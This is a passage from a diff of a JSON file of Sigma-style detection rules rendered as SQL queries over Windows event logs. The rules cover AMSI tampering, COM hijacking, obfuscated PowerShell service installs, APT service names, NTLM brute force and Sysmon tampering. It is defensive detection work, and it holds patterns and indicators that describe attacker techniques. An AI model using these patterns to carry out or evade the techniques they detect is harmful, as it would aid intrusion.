Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", - "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Removal Of Index Value to Hide Schedule Task - Registry", - "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" - ], - "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" - }, - { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", - "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", - "status": "experimental", - "description": "Detects COM object hijacking via TreatAs subkey", - "author": "Kutepov Anton, oscd.community", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "status": "test", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ - "Maybe some system utilities in rare cases use linking keys for backward compatibility" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "registry_add_persistence_com_key_linking.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Remote Utilities Host Service Install", + "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "description": "Detects Remote Utilities Host service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_remote_utilities.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Persistence Via Disk Cleanup Handler - Registry", - "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "title": "NetSupport Manager Service Install", + "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "description": "Detects NetSupport Manager service installation on the target system.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence" ], "falsepositives": [ - "Legitimate new entry added by windows" + "Legitimate use of the tool" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" ], - "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" + "filename": "win_system_service_install_netsupport_manager.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", - "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential RDP Exploit CVE-2019-0708", + "id": "aaa5b30d-f418-420b-83a0-299cb6024885", + "status": "test", + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "tags": [ - "attack.persistence" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Bad connections or network interruptions" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_rdp_potential_cve_2019_0708.yml" }, { - "title": "PUA - Sysinternal Tool Execution - Registry", - "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", - "author": "Markus Neis", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution" ], "falsepositives": [ - "Legitimate use of SysInternals tools", - "Programs that use the same Registry Key" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "title": "USB Device Plugged", + "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "description": "Detects plugged/unplugged USB devices", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1037.001", - "attack.persistence", - "attack.lateral_movement" + "attack.initial_access", + "attack.t1200" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate administrative activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-DriverFrameworks-UserMode/Operational' AND EventID IN ('2003', '2100', '2102'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_usb_device_plugged.yml" }, { - "title": "PUA - Sysinternals Tools Execution - Registry", - "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", - "status": "experimental", - "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Remote Desktop Connection to Non-Domain Host", + "id": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "status": "test", + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "author": "James Pemberton", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8001' AND TargetName LIKE 'TERMSRV%' ESCAPE '\\')" ], - "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" + "filename": "win_susp_ntlm_rdp.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", + "title": "NTLM Brute Force", + "id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "description": "Detects common NTLM brute force device names", + "author": "Jerry Shockley '@jsh0x'", "tags": [ - "attack.execution", - "attack.t1112" + "attack.credential_access", + "attack.t1110" ], "falsepositives": [ - "Unknown" + "Systems with names equal to the spoofed ones used by the brute force tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_susp_ntlm_brute_force.yml" }, { - "title": "Sysmon Configuration Change", - "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", - "status": "test", - "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", - "author": "frack113", + "title": "NTLM Logon", + "id": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "status": "experimental", + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Legitimate administrative action" + "Legacy hosts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" + "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8002' AND ProcessName LIKE '%' ESCAPE '\\')" ], - "filename": "sysmon_config_modification.yml" + "filename": "win_susp_ntlm_auth.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Suspicious Digital Signature Of AppX Package", + "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "status": "experimental", + "description": "Detects execution of AppX packages with known suspicious or malicious signature", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.execution" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_appxpackaging_om_sups_appx_signature.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "title": "Application Uninstalled", + "id": "570ae5ec-33dc-427c-b815-db86228ad43e", "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An application has been removed. Check if it is critical.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE EventID = '27'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_builtin_remove_application.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", - "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative 